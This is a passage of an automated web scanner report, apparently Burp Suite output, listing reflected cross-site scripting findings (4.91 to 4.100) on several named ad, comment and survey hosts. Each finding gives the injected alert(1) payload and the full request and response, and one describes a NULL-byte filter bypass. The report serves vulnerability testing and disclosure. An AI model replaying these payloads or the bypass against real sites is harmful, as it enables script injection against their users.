54960678256&mpt=1313102326%7D&siteid=0&Perf_Tracker_1=0000805760&Perf_Tracker_2=0001017409&Perf_Tracker_3=1183&ext_id=7512285371244257491&adid=344472&fcid=344462&ir_DAP_I131=1&ir_DAP_I132=1&ir_DAP_I133=8fa69d671310a47a24716fb1ff91af9850258caf&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=TunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE&ir_DAP_I130=&ir_DAP_U30=3&ir_DAP_I101=0&ir_DAP_U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254960678256&imp_rvr_id=254960678256976a0"%3balert(1)//3e2ec7b7f61&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANOgYEy-_0Bo-HCZRD1jHzH2WUROAAAAAItwCABkAAAAZAAAAAIAAACdaggAh7wAAAEAAABVU0QAVVNEANgCWgDASwAA7AwAAgMCAQUAAAAAfxTzEAAAAAA.%2Fcnd%3D%21HgUEKwj4uwIQndUhGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F725%252Fnydailynews%252F728x90%252Fnydnros_btf%253Ft%253D1313102360879%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.nydailynews.com%25252Findex.html%2526refer%253Dhttp%25253A%25252F%25252Fdeals.nydailynews.com%25252Fpublishers%25252F151%25252Fconsumer_password_resets%25252Fnew%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000805760%252Fmnum%253D0001017409%252Fcstr%253D14709292%253D_4e4459f6%252C8352185012%252C805760%255E1017409%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D14709292%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102360879&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=3484:15222/9609:2042/17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:45:33 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:27:32 GMT
ETag: "5e03a8-9f4-4a82327ce5d00"
Accept-Ranges: bytes
Content-Length: 5672
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck254960678256976a0";alert(1)//3e2ec7b7f61\">" );
var rvr_id=254960678256976a0";alert(1)//3e2ec7b7f61;
var mpserv;

...[SNIP]...

4.91. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e81ae"%3balert(1)//c6ff7eee9a1 was submitted in the mpck parameter. This input was echoed as e81ae";alert(1)//c6ff7eee9a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-2042-16%2F4%3Fmpt%3D1313102326%257D%26siteid%3D0%26Perf_Tracker_1%3D0000805760%26Perf_Tracker_2%3D0001017409%26Perf_Tracker_3%3D1183%26ext_id%3D7512285371244257491%26adid%3D344472%26fcid%3D344462%26ir_DAP_I131%3D1%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fa69d671310a47a24716fb1ff91af9850258caf%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3DTunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE%26ir_DAP_I130%3D%26ir_DAP_U30%3D3%26ir_DAP_I101%3D0%26ir_DAP_U38%3D9%26ir_DAP_U31%3Du%26ir_DAP_U26%3Dtrue%26ir_DAP_U25%3Dfalse%26ir_DAP_U24%3Dfalse%26ir_DAP_U33%3D4%26ir_DAP_I105%3D0%26ir_DAP_U34%3D1%26ir_DAP_U32%3DC%26ir_DAP_I106%3D0%26ir_DAP_U35%3D02018-0250%26rvr_id%3D254960678256%26imp_rvr_id%3D254960678256e81ae"%3balert(1)//c6ff7eee9a1&mpt=1313102326%7D&siteid=0&Perf_Tracker_1=0000805760&Perf_Tracker_2=0001017409&Perf_Tracker_3=1183&ext_id=7512285371244257491&adid=344472&fcid=344462&ir_DAP_I131=1&ir_DAP_I132=1&ir_DAP_I133=8fa69d671310a47a24716fb1ff91af9850258caf&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=TunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE&ir_DAP_I130=&ir_DAP_U30=3&ir_DAP_I101=0&ir_DAP_U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254960678256&imp_rvr_id=254960678256&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANOgYEy-_0Bo-HCZRD1jHzH2WUROAAAAAItwCABkAAAAZAAAAAIAAACdaggAh7wAAAEAAABVU0QAVVNEANgCWgDASwAA7AwAAgMCAQUAAAAAfxTzEAAAAAA.%2Fcnd%3D%21HgUEKwj4uwIQndUhGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F725%252Fnydailynews%252F728x90%252Fnydnros_btf%253Ft%253D1313102360879%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.nydailynews.com%25252Findex.html%2526refer%253Dhttp%25253A%25252F%25252Fdeals.nydailynews.com%25252Fpublishers%25252F151%25252Fconsumer_password_resets%25252Fnew%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000805760%252Fmnum%253D0001017409%252Fcstr%253D14709292%253D_4e4459f6%252C8352185012%252C805760%255E1017409%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D14709292%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102360879&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=3484:15222/9609:2042/17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:42:33 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:27:32 GMT
ETag: "5e03a8-9f4-4a82327ce5d00"
Accept-Ranges: bytes
Content-Length: 5674
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck254960678256\">" );
var rvr_id=254960678256;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";

...[SNIP]...
U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254960678256&imp_rvr_id=254960678256e81ae";alert(1)//c6ff7eee9a1";
var mpcke="<mpcke/>
...[SNIP]...

4.92. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bee9"%3balert(1)//4c140ba25e9 was submitted in the mpvc parameter. This input was echoed as 1bee9";alert(1)//4c140ba25e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-2042-16%2F4%3Fmpt%3D1313102326%257D%26siteid%3D0%26Perf_Tracker_1%3D0000805760%26Perf_Tracker_2%3D0001017409%26Perf_Tracker_3%3D1183%26ext_id%3D7512285371244257491%26adid%3D344472%26fcid%3D344462%26ir_DAP_I131%3D1%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fa69d671310a47a24716fb1ff91af9850258caf%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3DTunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE%26ir_DAP_I130%3D%26ir_DAP_U30%3D3%26ir_DAP_I101%3D0%26ir_DAP_U38%3D9%26ir_DAP_U31%3Du%26ir_DAP_U26%3Dtrue%26ir_DAP_U25%3Dfalse%26ir_DAP_U24%3Dfalse%26ir_DAP_U33%3D4%26ir_DAP_I105%3D0%26ir_DAP_U34%3D1%26ir_DAP_U32%3DC%26ir_DAP_I106%3D0%26ir_DAP_U35%3D02018-0250%26rvr_id%3D254960678256%26imp_rvr_id%3D254960678256&mpt=1313102326%7D&siteid=0&Perf_Tracker_1=0000805760&Perf_Tracker_2=0001017409&Perf_Tracker_3=1183&ext_id=7512285371244257491&adid=344472&fcid=344462&ir_DAP_I131=1&ir_DAP_I132=1&ir_DAP_I133=8fa69d671310a47a24716fb1ff91af9850258caf&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=TunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE&ir_DAP_I130=&ir_DAP_U30=3&ir_DAP_I101=0&ir_DAP_U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254960678256&imp_rvr_id=254960678256&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANOgYEy-_0Bo-HCZRD1jHzH2WUROAAAAAItwCABkAAAAZAAAAAIAAACdaggAh7wAAAEAAABVU0QAVVNEANgCWgDASwAA7AwAAgMCAQUAAAAAfxTzEAAAAAA.%2Fcnd%3D%21HgUEKwj4uwIQndUhGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F725%252Fnydailynews%252F728x90%252Fnydnros_btf%253Ft%253D1313102360879%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.nydailynews.com%25252Findex.html%2526refer%253Dhttp%25253A%25252F%25252Fdeals.nydailynews.com%25252Fpublishers%25252F151%25252Fconsumer_password_resets%25252Fnew%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000805760%252Fmnum%253D0001017409%252Fcstr%253D14709292%253D_4e4459f6%252C8352185012%252C805760%255E1017409%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D14709292%252Foptn%253D64%253Ftrg%253D1bee9"%3balert(1)//4c140ba25e9 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102360879&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=3484:15222/9609:2042/17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:45:50 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:27:32 GMT
ETag: "5e03a8-9f4-4a82327ce5d00"
Accept-Ranges: bytes
Content-Length: 5674
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck254960678256\">" );
var rvr_id=254960678256;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";

...[SNIP]...
vertising.com%2Fclick%2Fsite%3D0000805760%2Fmnum%3D0001017409%2Fcstr%3D14709292%3D_4e4459f6%2C8352185012%2C805760%5E1017409%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D14709292%2Foptn%3D64%3Ftrg%3D1bee9";alert(1)//4c140ba25e9";
var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANOgYEy-_0Bo-HCZRD1jHzH2WUROAAAAAItwCABkAAAAZAAAAAIAAACdaggAh7wAAAEAAABVU0QAVVNE
...[SNIP]...

4.93. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intensedebate.com
Path:	/js/getCommentCounts.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c589f'><script>alert(1)</script>a7f2b3d0ba2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/getCommentCounts.phpc589f'><script>alert(1)</script>a7f2b3d0ba2?src=wp-2&acct=212708dd21f0d86d12b845179edd5ef0&ids=&guids=&links=&titles=&authors=&times= HTTP/1.1
Host: intensedebate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whatgives.com/donationapp/?ref=pplabs

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 Aug 2011 14:09:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4806

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=5116184&host=intensedebate.com&back=http://intensedebate.com/js/getCommentCounts.phpc589f'><script>alert(1)</script>a7f2b3d0ba2?src=wp-2&acct=212708dd21f0d86d12b845179edd5ef0&ids=&guids=&links=&titles=&authors=&times='>
...[SNIP]...

4.94. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intensedebate.com
Path:	/js/wordpressTemplateLinkWrapper2.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 34ef6'><script>alert(1)</script>afd580c60d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/wordpressTemplateLinkWrapper2.php34ef6'><script>alert(1)</script>afd580c60d5?acct=212708dd21f0d86d12b845179edd5ef0 HTTP/1.1
Host: intensedebate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whatgives.com/donationapp/?ref=pplabs

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 Aug 2011 14:09:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4766

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=5116184&host=intensedebate.com&back=http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php34ef6'><script>alert(1)</script>afd580c60d5?acct=212708dd21f0d86d12b845179edd5ef0'>
...[SNIP]...

4.95. http://intensedebate.com/remoteVisit.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intensedebate.com
Path:	/remoteVisit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e4460'><script>alert(1)</script>e7e12777844 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /remoteVisit.phpe4460'><script>alert(1)</script>e7e12777844?acct=212708dd21f0d86d12b845179edd5ef0&time=1313158224112 HTTP/1.1
Host: intensedebate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whatgives.com/donationapp/?ref=pplabs

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 Aug 2011 14:10:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4765

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=5116184&host=intensedebate.com&back=http://intensedebate.com/remoteVisit.phpe4460'><script>alert(1)</script>e7e12777844?acct=212708dd21f0d86d12b845179edd5ef0&time=1313158224112'>
...[SNIP]...

4.96. http://interface.q-go.net/rightnow/index.php [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://interface.q-go.net
Path:	/rightnow/index.php

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 419d1'%3balert(1)//c9a64775f57 was submitted in the q parameter. This input was echoed as 419d1';alert(1)//c9a64775f57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rightnow/index.php?tpl=ask&q=xss419d1'%3balert(1)//c9a64775f57 HTTP/1.1
Host: interface.q-go.net
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/company-contact.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:16:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 3769
Connection: close
Content-Type: text/html; charset=iso-8859-15

<script type="text/javascript">window.parent.location.href="http://www.rightnow.com/search/?q=xss419d1%27%3Balert%281%29%2F%2Fc9a64775f57";</script><script type="text/javascript">window.parent.locatio
...[SNIP]...
<script type='text/javascript' charset='UTF-8'>var searchTerm = 'xss419d1';alert(1)//c9a64775f57';</script>
...[SNIP]...

4.97. http://ips-invite.iperceptions.com/webValidator.aspx [cD parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ips-invite.iperceptions.com
Path:	/webValidator.aspx

Issue detail

The value of the cD request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 835e9%3balert(1)//28fba634b62 was submitted in the cD parameter. This input was echoed as 835e9;alert(1)//28fba634b62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /webValidator.aspx?sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=STUDY&cD=835e9%3balert(1)//28fba634b62&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://go.magento.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE01
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Fri, 12 Aug 2011 13:44:36 GMT
Content-Length: 3026

var sID= '103836'; var sC= 'IPE103836';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY'; var ps='sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=S
...[SNIP]...
getLinkerUrl(url, false);
} catch(e){ }
return url;
}var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && GetC('IPE_S_103836') == null && tCv != null) {CCook(sC,sC,835e9;alert(1)//28fba634b62); Ld();} DCook(tC);function CCook(n,v,d){var exp= ''; var dm = document.domain;if (d) {var dt= new Date();dt.setTime(dt.getTime()+(d*24*60*60*1000));exp='; expires='+dt.toGMTString();}document.cookie=
...[SNIP]...

4.98. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ips-invite.iperceptions.com
Path:	/webValidator.aspx

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0024e08'-alert(1)-'3fafaf9c842 was submitted in the loc parameter. This input was echoed as 24e08'-alert(1)-'3fafaf9c842 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /webValidator.aspx?sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=STUDY%0024e08'-alert(1)-'3fafaf9c842&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://go.magento.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE03
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Fri, 12 Aug 2011 13:44:23 GMT
Content-Length: 3034

var sID= '103836'; var sC= 'IPE103836';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY.24e08'-alert(1)-'3fafaf9c842'; var ps='sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=STUDY%0024e08%27-alert(1)-%273fafaf9c842&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite';
...[SNIP]...

4.99. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ips-invite.iperceptions.com
Path:	/webValidator.aspx

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddae3'%3beb11d4767f0 was submitted in the loc parameter. This input was echoed as ddae3';eb11d4767f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /webValidator.aspx?sdfc=5c865147-103836-b9facb55-d938-46a8-a351-1fac255b1191&lID=1&loc=ddae3'%3beb11d4767f0&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://go.magento.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

4.100. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ed672<script>alert(1)</script>e8459f403c7 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K05540ed672<script>alert(1)</script>e8459f403c7 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
